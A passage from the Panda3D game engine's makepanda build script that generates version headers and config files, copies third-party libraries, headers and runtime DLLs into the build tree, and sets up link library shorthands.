if (PkgSkip(x)): ConditionalWriteFile(GetOutputDir() + '/tmp/dtool_have_'+x.lower()+'.dat', "0\n")
else: ConditionalWriteFile(GetOutputDir() + '/tmp/dtool_have_'+x.lower()+'.dat', "1\n")
WriteConfigSettings()
WarnConflictingFiles()
if SystemLibraryExists("dtoolbase"):
print("%sWARNING:%s Found conflicting Panda3D libraries from other ppremake build!" % (GetColor("red"), GetColor()))
if SystemLibraryExists("p3dtoolconfig"):
print("%sWARNING:%s Found conflicting Panda3D libraries from other makepanda build!" % (GetColor("red"), GetColor()))
##########################################################################################
#
# Generate pandaVersion.h, pythonversion, null.cxx, etc.
#
##########################################################################################
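# The header templates below use simple $-placeholders ($VERSION1, $NVERSION,
# $DISTRIBUTOR, ...) that CreatePandaVersionFiles substitutes via str.replace()
# before writing the generated files.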
PANDAVERSION_H="""
#define PANDA_MAJOR_VERSION $VERSION1
#define PANDA_MINOR_VERSION $VERSION2
#define PANDA_SEQUENCE_VERSION $VERSION3
#define PANDA_VERSION $NVERSION
#define PANDA_NUMERIC_VERSION $NVERSION
#define PANDA_VERSION_STR "$VERSION1.$VERSION2.$VERSION3"
#define PANDA_ABI_VERSION_STR "$VERSION1.$VERSION2"
#define PANDA_DISTRIBUTOR "$DISTRIBUTOR"
#define PANDA_PACKAGE_VERSION_STR "$RTDIST_VERSION"
#define PANDA_PACKAGE_HOST_URL "$HOST_URL"
"""
PANDAVERSION_H_RUNTIME="""
#define PANDA_MAJOR_VERSION 0
#define PANDA_MINOR_VERSION 0
#define PANDA_SEQUENCE_VERSION 0
#define PANDA_VERSION_STR "0.0.0"
#define PANDA_ABI_VERSION_STR "0.0"
#define P3D_PLUGIN_MAJOR_VERSION $VERSION1
#define P3D_PLUGIN_MINOR_VERSION $VERSION2
#define P3D_PLUGIN_SEQUENCE_VERSION $VERSION3
#define P3D_PLUGIN_VERSION_STR "$VERSION1.$VERSION2.$VERSION3"
#define P3D_COREAPI_VERSION_STR "$COREAPI_VERSION"
#define PANDA_DISTRIBUTOR "$DISTRIBUTOR"
#define PANDA_PACKAGE_VERSION_STR ""
#define PANDA_PACKAGE_HOST_URL "$HOST_URL"
"""
CHECKPANDAVERSION_CXX="""
# include "dtoolbase.h"
EXPCL_DTOOL_DTOOLUTIL int panda_version_$VERSION1_$VERSION2 = 0;
"""
CHECKPANDAVERSION_H="""
# include "dtoolbase.h"
extern EXPCL_DTOOL_DTOOLUTIL int panda_version_$VERSION1_$VERSION2;
# ifndef WIN32
/* For Windows, exporting the symbol from the DLL is sufficient; the
DLL will not load unless all expected public symbols are defined.
Other systems may not mind if the symbol is absent unless we
   explicitly write code that references it. */
static int check_panda_version = panda_version_$VERSION1_$VERSION2;
# endif
"""
P3DACTIVEX_RC="""#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
#include "afxres.h"
#undef APSTUDIO_READONLY_SYMBOLS
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)
#endif
#ifdef APSTUDIO_INVOKED
1 TEXTINCLUDE
BEGIN
"resource.h\\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""afxres.h""\\r\\n"
"\\0"
END
3 TEXTINCLUDE
BEGIN
"1 TYPELIB ""P3DActiveX.tlb""\\r\\n"
"\\0"
END
#endif
%s
IDB_P3DACTIVEX BITMAP "P3DActiveXCtrl.bmp"
IDD_PROPPAGE_P3DACTIVEX DIALOG 0, 0, 250, 62
STYLE DS_SETFONT | WS_CHILD
FONT 8, "MS Sans Serif"
BEGIN
LTEXT "TODO: Place controls to manipulate properties of P3DActiveX Control on this dialog.",
IDC_STATIC,7,25,229,16
END
#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
IDD_PROPPAGE_P3DACTIVEX, DIALOG
BEGIN
LEFTMARGIN, 7
RIGHTMARGIN, 243
TOPMARGIN, 7
BOTTOMMARGIN, 55
END
END
#endif
STRINGTABLE
BEGIN
IDS_P3DACTIVEX "P3DActiveX Control"
IDS_P3DACTIVEX_PPG "P3DActiveX Property Page"
END
STRINGTABLE
BEGIN
IDS_P3DACTIVEX_PPG_CAPTION "General"
END
#endif
#ifndef APSTUDIO_INVOKED
1 TYPELIB "P3DActiveX.tlb"
#endif"""
def CreatePandaVersionFiles():
version1=int(VERSION.split(".")[0])
version2=int(VERSION.split(".")[1])
version3=int(VERSION.split(".")[2])
nversion=version1*1000000+version2*1000+version3
if (DISTRIBUTOR != "cmu"):
# Subtract 1 if we are not an official version.
nversion -= 1
if (RUNTIME):
pandaversion_h = PANDAVERSION_H_RUNTIME
else:
pandaversion_h = PANDAVERSION_H
pandaversion_h = pandaversion_h.replace("$VERSION1",str(version1))
pandaversion_h = pandaversion_h.replace("$VERSION2",str(version2))
pandaversion_h = pandaversion_h.replace("$VERSION3",str(version3))
pandaversion_h = pandaversion_h.replace("$NVERSION",str(nversion))
pandaversion_h = pandaversion_h.replace("$DISTRIBUTOR",DISTRIBUTOR)
pandaversion_h = pandaversion_h.replace("$RTDIST_VERSION",RTDIST_VERSION)
pandaversion_h = pandaversion_h.replace("$COREAPI_VERSION",COREAPI_VERSION)
pandaversion_h = pandaversion_h.replace("$HOST_URL",(HOST_URL or ""))
if (DISTRIBUTOR == "cmu"):
pandaversion_h += "\n#define PANDA_OFFICIAL_VERSION\n"
else:
pandaversion_h += "\n#undef PANDA_OFFICIAL_VERSION\n"
if GIT_COMMIT:
pandaversion_h += "\n#define PANDA_GIT_COMMIT_STR \"%s\"\n" % (GIT_COMMIT)
if not RUNTIME:
checkpandaversion_cxx = CHECKPANDAVERSION_CXX.replace("$VERSION1",str(version1))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$VERSION2",str(version2))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$VERSION3",str(version3))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$NVERSION",str(nversion))
checkpandaversion_h = CHECKPANDAVERSION_H.replace("$VERSION1",str(version1))
checkpandaversion_h = checkpandaversion_h.replace("$VERSION2",str(version2))
checkpandaversion_h = checkpandaversion_h.replace("$VERSION3",str(version3))
checkpandaversion_h = checkpandaversion_h.replace("$NVERSION",str(nversion))
ConditionalWriteFile(GetOutputDir()+'/include/pandaVersion.h', pandaversion_h)
if RUNTIME:
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.cxx', '')
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.h', '')
else:
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.cxx', checkpandaversion_cxx)
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.h', checkpandaversion_h)
ConditionalWriteFile(GetOutputDir()+"/tmp/null.cxx","")
if RUNTIME:
p3dactivex_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "p3dactivex.ocx",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet"}
ConditionalWriteFile(GetOutputDir()+"/include/P3DActiveX.rc", P3DACTIVEX_RC % GenerateResourceFile(**p3dactivex_rc))
CreatePandaVersionFiles()
##########################################################################################
#
# Copy the "direct" tree
#
##########################################################################################
if (PkgSkip("DIRECT")==0):
CopyPythonTree(GetOutputDir() + '/direct', 'direct/src', threads=THREADCOUNT)
ConditionalWriteFile(GetOutputDir() + '/direct/__init__.py', "")
# This file used to be copied, but would nowadays cause conflicts.
# Let's get it out of the way in case someone hasn't cleaned their build since.
if os.path.isfile(GetOutputDir() + '/bin/panda3d.py'):
os.remove(GetOutputDir() + '/bin/panda3d.py')
if os.path.isfile(GetOutputDir() + '/lib/panda3d.py'):
os.remove(GetOutputDir() + '/lib/panda3d.py')
# This directory doesn't exist at all any more.
if os.path.isdir(os.path.join(GetOutputDir(), 'direct', 'ffi')):
shutil.rmtree(os.path.join(GetOutputDir(), 'direct', 'ffi'))
# These files used to exist; remove them to avoid conflicts.
del_files = ['core.py', 'core.pyc', 'core.pyo',
'_core.pyd', '_core.so',
'direct.py', 'direct.pyc', 'direct.pyo',
'_direct.pyd', '_direct.so',
'dtoolconfig.pyd', 'dtoolconfig.so']
for basename in del_files:
path = os.path.join(GetOutputDir(), 'panda3d', basename)
if os.path.isfile(path):
print("Removing %s" % (path))
os.remove(path)
# Write an appropriate panda3d/__init__.py
p3d_init = """"Python bindings for the Panda3D libraries"
__version__ = '%s'
""" % (WHLVERSION)
if GetTarget() == 'windows':
p3d_init += """
import os
bindir = os.path.join(os.path.dirname(__file__), '..', 'bin')
if os.path.isdir(bindir):
if not os.environ.get('PATH'):
os.environ['PATH'] = bindir
else:
os.environ['PATH'] = bindir + os.pathsep + os.environ['PATH']
del os, bindir
"""
if not PkgSkip("PYTHON"):
ConditionalWriteFile(GetOutputDir() + '/panda3d/__init__.py', p3d_init)
# Also add this file, for backward compatibility.
ConditionalWriteFile(GetOutputDir() + '/panda3d/dtoolconfig.py', """
if __debug__:
print("Warning: panda3d.dtoolconfig is deprecated, use panda3d.interrogatedb instead.")
from .interrogatedb import *
""")
# PandaModules is now deprecated; generate a shim for backward compatibility.
for fn in glob.glob(GetOutputDir() + '/pandac/*.py') + glob.glob(GetOutputDir() + '/pandac/*.py[co]'):
if os.path.basename(fn) not in ('PandaModules.py', '__init__.py'):
os.remove(fn)
panda_modules = ['core']
if not PkgSkip("PANDAPHYSICS"):
panda_modules.append('physics')
if not PkgSkip('PANDAFX'):
panda_modules.append('fx')
if not PkgSkip("DIRECT"):
panda_modules.append('direct')
if not PkgSkip("VISION"):
panda_modules.append('vision')
if not PkgSkip("SKEL"):
panda_modules.append('skel')
if not PkgSkip("EGG"):
panda_modules.append('egg')
if not PkgSkip("AWESOMIUM"):
panda_modules.append('awesomium')
if not PkgSkip("ODE"):
panda_modules.append('ode')
if not PkgSkip("VRPN"):
panda_modules.append('vrpn')
panda_modules_code = """
"This module is deprecated. Import from panda3d.core and other panda3d.* modules instead."
if __debug__:
print("Warning: pandac.PandaModules is deprecated, import from panda3d.core instead")
"""
for module in panda_modules:
panda_modules_code += """
try:
from panda3d.%s import *
except ImportError as err:
if "No module named %s" not in str(err):
raise""" % (module, module)
exthelpers_code = """
"This module is deprecated. Import from direct.extensions_native.extension_native_helpers instead."
from direct.extensions_native.extension_native_helpers import *
"""
if not PkgSkip("PYTHON"):
ConditionalWriteFile(GetOutputDir() + '/pandac/PandaModules.py', panda_modules_code)
ConditionalWriteFile(GetOutputDir() + '/pandac/extension_native_helpers.py', exthelpers_code)
ConditionalWriteFile(GetOutputDir() + '/pandac/__init__.py', '')
##########################################################################################
#
# Generate the PRC files into the ETC directory.
#
##########################################################################################
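# Config.prc and Confauto.prc are generated from the .in templates in
# makepanda/, enabling the SpeedTree stanza only when that package is present
# and applying per-platform substitutions (cache directory, display and audio
# defaults) before writing them into etc/.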
confautoprc = ReadFile("makepanda/confauto.in")
if (PkgSkip("SPEEDTREE")==0):
# If SpeedTree is available, enable it in the config file
confautoprc = confautoprc.replace('#st#', '')
else:
# otherwise, disable it.
confautoprc = confautoprc.replace('#st#', '#')
if (os.path.isfile("makepanda/myconfig.in")):
configprc = ReadFile("makepanda/myconfig.in")
else:
configprc = ReadFile("makepanda/config.in")
if (GetTarget() == 'windows'):
configprc = configprc.replace("$XDG_CACHE_HOME/panda3d", "$USER_APPDATA/Panda3D-%s" % MAJOR_VERSION)
else:
configprc = configprc.replace("aux-display pandadx9", "")
if (GetTarget() == 'darwin'):
configprc = configprc.replace("$XDG_CACHE_HOME/panda3d", "Library/Caches/Panda3D-%s" % MAJOR_VERSION)
# OpenAL is not yet working well on OSX for us, so let's do this for now.
configprc = configprc.replace("p3openal_audio", "p3fmod_audio")
if GetTarget() == 'windows':
# Convert to Windows newlines.
ConditionalWriteFile(GetOutputDir()+"/etc/Config.prc", configprc, newline='\r\n')
ConditionalWriteFile(GetOutputDir()+"/etc/Confauto.prc", confautoprc, newline='\r\n')
else:
ConditionalWriteFile(GetOutputDir()+"/etc/Config.prc", configprc)
ConditionalWriteFile(GetOutputDir()+"/etc/Confauto.prc", confautoprc)
##########################################################################################
#
# Copy the precompiled binaries and DLLs into the build.
#
##########################################################################################
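# Copy the prebuilt third-party libraries into the output tree.  On Windows
# the DLLs go into bin/; on macOS the dylibs go into lib/ and have their
# install names rewritten with install_name_tool so the build stays
# relocatable; on other Unix systems the .so files are copied into lib/,
# while Python extension modules are placed at the output root.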
tp_dir = GetThirdpartyDir()
if tp_dir is not None:
dylibs = {}
if GetTarget() == 'darwin':
# Make a list of all the dylibs we ship, to figure out whether we should use
# install_name_tool to correct the library reference to point to our copy.
for lib in glob.glob(tp_dir + "/*/lib/*.dylib"):
dylibs[os.path.basename(lib)] = os.path.basename(os.path.realpath(lib))
if not PkgSkip("PYTHON"):
for lib in glob.glob(tp_dir + "/*/lib/" + SDK["PYTHONVERSION"] + "/*.dylib"):
dylibs[os.path.basename(lib)] = os.path.basename(os.path.realpath(lib))
for pkg in PkgListGet():
if PkgSkip(pkg):
continue
tp_pkg = tp_dir + pkg.lower()
if GetTarget() == 'windows':
if os.path.exists(tp_pkg + "/bin"):
CopyAllFiles(GetOutputDir() + "/bin/", tp_pkg + "/bin/")
if (PkgSkip("PYTHON")==0 and os.path.exists(tp_pkg + "/bin/" + SDK["PYTHONVERSION"])):
CopyAllFiles(GetOutputDir() + "/bin/", tp_pkg + "/bin/" + SDK["PYTHONVERSION"] + "/")
elif GetTarget() == 'darwin':
tp_libs = glob.glob(tp_pkg + "/lib/*.dylib")
if not PkgSkip("PYTHON"):
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.dylib"))
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.so"))
if pkg != 'PYTHON':
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.py"))
for tp_lib in tp_libs:
basename = os.path.basename(tp_lib)
if basename.endswith('.dylib'):
# It's a dynamic link library. Put it in the lib directory.
target = GetOutputDir() + "/lib/" + basename
dep_prefix = "@loader_path/../lib/"
lib_id = dep_prefix + basename
else:
# It's a Python module, like _rocketcore.so. Copy it to the root, because
# nowadays the 'lib' directory may no longer be on the PYTHONPATH.
target = GetOutputDir() + "/" + basename
dep_prefix = "@loader_path/lib/"
lib_id = basename
if not NeedsBuild([target], [tp_lib]):
continue
CopyFile(target, tp_lib)
if os.path.islink(target) or target.endswith('.py'):
continue
# Correct the inter-library dependencies so that the build is relocatable.
oscmd('install_name_tool -id %s %s' % (lib_id, target))
oscmd("otool -L %s | grep .dylib > %s/tmp/otool-libs.txt" % (target, GetOutputDir()), True)
for line in open(GetOutputDir() + "/tmp/otool-libs.txt", "r"):
line = line.strip()
if not line or line.startswith(dep_prefix) or line.endswith(":"):
continue
libdep = line.split(" ", 1)[0]
dep_basename = os.path.basename(libdep)
if dep_basename in dylibs:
dep_target = dylibs[dep_basename]
oscmd("install_name_tool -change %s %s%s %s" % (libdep, dep_prefix, dep_target, target), True)
JustBuilt([target], [tp_lib])
for fwx in glob.glob(tp_pkg + "/*.framework"):
CopyTree(GetOutputDir() + "/Frameworks/" + os.path.basename(fwx), fwx)
else: # Linux / FreeBSD case.
for tp_lib in glob.glob(tp_pkg + "/lib/*.so*"):
CopyFile(GetOutputDir() + "/lib/" + os.path.basename(tp_lib), tp_lib)
if not PkgSkip("PYTHON"):
for tp_lib in glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.so*")):
base = os.path.basename(tp_lib)
if base.startswith('lib'):
CopyFile(GetOutputDir() + "/lib/" + base, tp_lib)
else:
# It's a Python module, like _rocketcore.so.
CopyFile(GetOutputDir() + "/" + base, tp_lib)
if GetTarget() == 'windows':
if os.path.isdir(os.path.join(tp_dir, "extras", "bin")):
CopyAllFiles(GetOutputDir() + "/bin/", tp_dir + "extras/bin/")
if not PkgSkip("PYTHON") and not RTDIST:
# We need to copy the Python DLL to the bin directory for now.
pydll = "/" + SDK["PYTHONVERSION"].replace(".", "")
if GetOptimize() <= 2:
pydll += "_d.dll"
else:
pydll += ".dll"
CopyFile(GetOutputDir() + "/bin" + pydll, SDK["PYTHON"] + pydll)
for fn in glob.glob(SDK["PYTHON"] + "/vcruntime*.dll"):
CopyFile(GetOutputDir() + "/bin/", fn)
# Copy the whole Python directory.
CopyTree(GetOutputDir() + "/python", SDK["PYTHON"])
# NB: Python does not always ship with the correct manifest/dll.
# Figure out the correct one to ship, and grab it from WinSxS dir.
manifest = GetOutputDir() + '/tmp/python.manifest'
if os.path.isfile(manifest):
os.unlink(manifest)
oscmd('mt -inputresource:"%s\\python.exe";#1 -out:"%s" -nologo' % (SDK["PYTHON"], manifest), True)
if os.path.isfile(manifest):
import xml.etree.ElementTree as ET
tree = ET.parse(manifest)
idents = tree.findall('./{urn:schemas-microsoft-com:asm.v1}dependency/{urn:schemas-microsoft-com:asm.v1}dependentAssembly/{urn:schemas-microsoft-com:asm.v1}assemblyIdentity')
else:
idents = ()
for ident in idents:
sxs_name = '_'.join([
ident.get('processorArchitecture'),
ident.get('name').lower(),
ident.get('publicKeyToken'),
ident.get('version'),
])
# Find the manifest matching these parameters.
pattern = os.path.join('C:' + os.sep, 'Windows', 'WinSxS', 'Manifests', sxs_name + '_*.manifest')
manifests = glob.glob(pattern)
if not manifests:
print("%sWARNING:%s Could not locate manifest %s. You may need to reinstall the Visual C++ Redistributable." % (GetColor("red"), GetColor(), pattern))
continue
CopyFile(GetOutputDir() + "/python/" + ident.get('name') + ".manifest", manifests[0])
# Also copy the corresponding msvcr dll.
pattern = os.path.join('C:' + os.sep, 'Windows', 'WinSxS', sxs_name + '_*', 'msvcr*.dll')
for file in glob.glob(pattern):
CopyFile(GetOutputDir() + "/python/", file)
# Copy python.exe to ppython.exe.
if not os.path.isfile(SDK["PYTHON"] + "/ppython.exe") and os.path.isfile(SDK["PYTHON"] + "/python.exe"):
CopyFile(GetOutputDir() + "/python/ppython.exe", SDK["PYTHON"] + "/python.exe")
if not os.path.isfile(SDK["PYTHON"] + "/ppythonw.exe") and os.path.isfile(SDK["PYTHON"] + "/pythonw.exe"):
CopyFile(GetOutputDir() + "/python/ppythonw.exe", SDK["PYTHON"] + "/pythonw.exe")
ConditionalWriteFile(GetOutputDir() + "/python/panda.pth", "..\n../bin\n")
# Copy over the MSVC runtime.
if GetTarget() == 'windows' and "VISUALSTUDIO" in SDK:
vsver = "%s%s" % SDK["VISUALSTUDIO_VERSION"]
vcver = "%s%s" % (SDK["MSVC_VERSION"][0], 0) # ignore minor version.
crtname = "Microsoft.VC%s.CRT" % (vsver)
if ("VCTOOLSVERSION" in SDK):
dir = os.path.join(SDK["VISUALSTUDIO"], "VC", "Redist", "MSVC", SDK["VCTOOLSVERSION"], "onecore", GetTargetArch(), crtname)
else:
dir = os.path.join(SDK["VISUALSTUDIO"], "VC", "redist", GetTargetArch(), crtname)
if os.path.isfile(os.path.join(dir, "msvcr" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "msvcr" + vcver + ".dll"))
if os.path.isfile(os.path.join(dir, "msvcp" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "msvcp" + vcver + ".dll"))
if os.path.isfile(os.path.join(dir, "vcruntime" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "vcruntime" + vcver + ".dll"))
########################################################################
##
## Copy various stuff into the build.
##
########################################################################
if GetTarget() == 'windows':
# Convert to Windows newlines so they can be opened by notepad.
WriteFile(GetOutputDir() + "/LICENSE", ReadFile("doc/LICENSE"), newline='\r\n')
WriteFile(GetOutputDir() + "/ReleaseNotes", ReadFile("doc/ReleaseNotes"), newline='\r\n')
CopyFile(GetOutputDir() + "/pandaIcon.ico", "panda/src/configfiles/pandaIcon.ico")
else:
CopyFile(GetOutputDir()+"/", "doc/LICENSE")
CopyFile(GetOutputDir()+"/", "doc/ReleaseNotes")
if (PkgSkip("PANDATOOL")==0):
CopyAllFiles(GetOutputDir()+"/plugins/", "pandatool/src/scripts/", ".mel")
CopyAllFiles(GetOutputDir()+"/plugins/", "pandatool/src/scripts/", ".ms")
if (PkgSkip("PYTHON")==0 and os.path.isdir(GetThirdpartyBase()+"/Pmw")):
CopyTree(GetOutputDir()+'/Pmw', GetThirdpartyBase()+'/Pmw')
ConditionalWriteFile(GetOutputDir()+'/include/ctl3d.h', '/* dummy file to make MAX happy */')
# Since Eigen is included by all sorts of core headers, as a convenience
# to C++ users on Win and Mac, we include it in the Panda include directory.
if not PkgSkip("EIGEN") and GetTarget() in ("windows", "darwin") and GetThirdpartyDir():
CopyTree(GetOutputDir()+'/include/Eigen', GetThirdpartyDir()+'eigen/include/Eigen')
########################################################################
#
# Copy header files to the built/include/parser-inc directory.
#
########################################################################
CopyTree(GetOutputDir()+'/include/parser-inc','dtool/src/parser-inc')
DeleteVCS(GetOutputDir()+'/include/parser-inc')
########################################################################
#
# Transfer all header files to the built/include directory.
#
########################################################################
CopyAllHeaders('dtool/src/dtoolbase')
CopyAllHeaders('dtool/src/dtoolutil', skip=["pandaVersion.h", "checkPandaVersion.h"])
CopyFile(GetOutputDir()+'/include/','dtool/src/dtoolutil/vector_src.cxx')
CopyAllHeaders('dtool/metalibs/dtool')
CopyAllHeaders('dtool/src/cppparser')
CopyAllHeaders('dtool/src/prc', skip=["prc_parameters.h"])
CopyAllHeaders('dtool/src/dconfig')
CopyAllHeaders('dtool/src/interrogatedb')
CopyAllHeaders('dtool/metalibs/dtoolconfig')
CopyAllHeaders('dtool/src/pystub')
CopyAllHeaders('dtool/src/interrogate')
CopyAllHeaders('dtool/src/test_interrogate')
CopyAllHeaders('panda/src/putil')
CopyAllHeaders('panda/src/pandabase')
CopyAllHeaders('panda/src/express')
CopyAllHeaders('panda/src/downloader')
CopyAllHeaders('panda/metalibs/pandaexpress')
CopyAllHeaders('panda/src/pipeline')
CopyAllHeaders('panda/src/linmath')
CopyAllHeaders('panda/src/putil')
CopyAllHeaders('dtool/src/prckeys')
CopyAllHeaders('panda/src/audio')
CopyAllHeaders('panda/src/event')
CopyAllHeaders('panda/src/mathutil')
CopyAllHeaders('panda/src/gsgbase')
CopyAllHeaders('panda/src/pnmimage')
CopyAllHeaders('panda/src/nativenet')
CopyAllHeaders('panda/src/net')
CopyAllHeaders('panda/src/pstatclient')
CopyAllHeaders('panda/src/gobj')
CopyAllHeaders('panda/src/movies')
CopyAllHeaders('panda/src/pgraphnodes')
CopyAllHeaders('panda/src/pgraph')
CopyAllHeaders('panda/src/cull')
CopyAllHeaders('panda/src/chan')
CopyAllHeaders('panda/src/char')
CopyAllHeaders('panda/src/dgraph')
CopyAllHeaders('panda/src/display')
CopyAllHeaders('panda/src/device')
CopyAllHeaders('panda/src/pnmtext')
CopyAllHeaders('panda/src/text')
CopyAllHeaders('panda/src/grutil')
if (PkgSkip("VISION")==0):
CopyAllHeaders('panda/src/vision')
CopyAllHeaders('panda/src/awesomium')
if (PkgSkip("FFMPEG")==0):
CopyAllHeaders('panda/src/ffmpeg')
CopyAllHeaders('panda/src/tform')
CopyAllHeaders('panda/src/collide')
CopyAllHeaders('panda/src/parametrics')
CopyAllHeaders('panda/src/pgui')
CopyAllHeaders('panda/src/pnmimagetypes')
CopyAllHeaders('panda/src/recorder')
if (PkgSkip("ROCKET")==0):
CopyAllHeaders('panda/src/rocket')
if (PkgSkip("VRPN")==0):
CopyAllHeaders('panda/src/vrpn')
CopyAllHeaders('panda/src/wgldisplay')
CopyAllHeaders('panda/src/ode')
CopyAllHeaders('panda/metalibs/pandaode')
if (PkgSkip("PANDAPHYSICS")==0):
CopyAllHeaders('panda/src/physics')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
CopyAllHeaders('panda/src/particlesystem')
CopyAllHeaders('panda/src/dxml')
CopyAllHeaders('panda/metalibs/panda')
CopyAllHeaders('panda/src/audiotraits')
CopyAllHeaders('panda/src/distort')
CopyAllHeaders('panda/src/downloadertools')
CopyAllHeaders('panda/src/windisplay')
CopyAllHeaders('panda/src/dxgsg9')
CopyAllHeaders('panda/metalibs/pandadx9')
if not PkgSkip("EGG"):
CopyAllHeaders('panda/src/egg')
CopyAllHeaders('panda/src/egg2pg')
CopyAllHeaders('panda/src/framework')
CopyAllHeaders('panda/metalibs/pandafx')
CopyAllHeaders('panda/src/glstuff')
CopyAllHeaders('panda/src/glgsg')
CopyAllHeaders('panda/src/glesgsg')
CopyAllHeaders('panda/src/gles2gsg')
if not PkgSkip("EGG"):
CopyAllHeaders('panda/metalibs/pandaegg')
if GetTarget() == 'windows':
CopyAllHeaders('panda/src/wgldisplay')
elif GetTarget() == 'darwin':
CopyAllHeaders('panda/src/osxdisplay')
CopyAllHeaders('panda/src/cocoadisplay')
elif GetTarget() == 'android':
CopyAllHeaders('panda/src/android')
CopyAllHeaders('panda/src/androiddisplay')
else:
CopyAllHeaders('panda/src/x11display')
CopyAllHeaders('panda/src/glxdisplay')
CopyAllHeaders('panda/src/egldisplay')
CopyAllHeaders('panda/metalibs/pandagl')
CopyAllHeaders('panda/metalibs/pandagles')
CopyAllHeaders('panda/metalibs/pandagles2')
CopyAllHeaders('panda/metalibs/pandaphysics')
CopyAllHeaders('panda/src/testbed')
if (PkgSkip("PHYSX")==0):
CopyAllHeaders('panda/src/physx')
CopyAllHeaders('panda/metalibs/pandaphysx')
if (PkgSkip("BULLET")==0):
CopyAllHeaders('panda/src/bullet')
CopyAllHeaders('panda/metalibs/pandabullet')
if (PkgSkip("SPEEDTREE")==0):
CopyAllHeaders('panda/src/speedtree')
if (PkgSkip("DIRECT")==0):
CopyAllHeaders('direct/src/directbase')
CopyAllHeaders('direct/src/dcparser')
CopyAllHeaders('direct/src/deadrec')
CopyAllHeaders('direct/src/distributed')
CopyAllHeaders('direct/src/interval')
CopyAllHeaders('direct/src/showbase')
CopyAllHeaders('direct/src/dcparse')
if (RUNTIME or RTDIST):
CopyAllHeaders('direct/src/plugin', skip=["p3d_plugin_config.h"])
if (RUNTIME):
CopyAllHeaders('direct/src/plugin_npapi')
CopyAllHeaders('direct/src/plugin_standalone')
if (PkgSkip("PANDATOOL")==0):
CopyAllHeaders('pandatool/src/pandatoolbase')
CopyAllHeaders('pandatool/src/converter')
CopyAllHeaders('pandatool/src/progbase')
CopyAllHeaders('pandatool/src/eggbase')
CopyAllHeaders('pandatool/src/bam')
CopyAllHeaders('pandatool/src/cvscopy')
CopyAllHeaders('pandatool/src/daeegg')
CopyAllHeaders('pandatool/src/daeprogs')
CopyAllHeaders('pandatool/src/dxf')
CopyAllHeaders('pandatool/src/dxfegg')
CopyAllHeaders('pandatool/src/dxfprogs')
CopyAllHeaders('pandatool/src/palettizer')
CopyAllHeaders('pandatool/src/egg-mkfont')
CopyAllHeaders('pandatool/src/eggcharbase')
CopyAllHeaders('pandatool/src/egg-optchar')
CopyAllHeaders('pandatool/src/egg-palettize')
CopyAllHeaders('pandatool/src/egg-qtess')
CopyAllHeaders('pandatool/src/eggprogs')
CopyAllHeaders('pandatool/src/flt')
CopyAllHeaders('pandatool/src/fltegg')
CopyAllHeaders('pandatool/src/fltprogs')
CopyAllHeaders('pandatool/src/imagebase')
CopyAllHeaders('pandatool/src/imageprogs')
CopyAllHeaders('pandatool/src/pfmprogs')
CopyAllHeaders('pandatool/src/lwo')
CopyAllHeaders('pandatool/src/lwoegg')
CopyAllHeaders('pandatool/src/lwoprogs')
CopyAllHeaders('pandatool/src/maya')
CopyAllHeaders('pandatool/src/mayaegg')
CopyAllHeaders('pandatool/src/maxegg')
CopyAllHeaders('pandatool/src/maxprogs')
CopyAllHeaders('pandatool/src/objegg')
CopyAllHeaders('pandatool/src/objprogs')
CopyAllHeaders('pandatool/src/vrml')
CopyAllHeaders('pandatool/src/vrmlegg')
CopyAllHeaders('pandatool/src/xfile')
CopyAllHeaders('pandatool/src/xfileegg')
CopyAllHeaders('pandatool/src/ptloader')
CopyAllHeaders('pandatool/src/miscprogs')
CopyAllHeaders('pandatool/src/pstatserver')
CopyAllHeaders('pandatool/src/softprogs')
CopyAllHeaders('pandatool/src/text-stats')
CopyAllHeaders('pandatool/src/vrmlprogs')
CopyAllHeaders('pandatool/src/win-stats')
CopyAllHeaders('pandatool/src/xfileprogs')
if (PkgSkip("CONTRIB")==0):
CopyAllHeaders('contrib/src/contribbase')
CopyAllHeaders('contrib/src/ai')
########################################################################
#
# These definitions are syntactic shorthand. They make it easy
# to link with the usual libraries without listing them all.
#
########################################################################
COMMON_DTOOL_LIBS=[
'libp3dtool.dll',
'libp3dtoolconfig.dll',
]
COMMON_PANDA_LIBS=[
'libpanda.dll',
'libpandaexpress.dll'
] + COMMON_DTOOL_LIBS
COMMON_EGG2X_LIBS=[
'libp3eggbase.lib',
'libp3progbase.lib',
'libp3converter.lib',
'libp3pandatoolbase.lib',
'libpandaegg.dll',
] + COMMON_PANDA_LIBS
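# These lists are passed straight to TargetAdd() as link inputs, e.g.
#   TargetAdd('interrogate.exe', input=COMMON_DTOOL_LIBS)
# so a target pulls in the whole stack of core libraries with one line.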
########################################################################
#
# This section contains a list of all the files that need to be compiled.
#
########################################################################
print("Generating dependencies...")
sys.stdout.flush()
#
# Compile the Panda icon resource file.
# We do this first because it is needed
# whenever we compile an executable.
#
if GetTarget() == 'windows':
OPTS=['DIR:panda/src/configfiles']
TargetAdd('pandaIcon.res', opts=OPTS, input='pandaIcon.rc')
#
# DIRECTORY: dtool/src/dtoolbase/
#
OPTS=['DIR:dtool/src/dtoolbase', 'BUILDING:DTOOL']
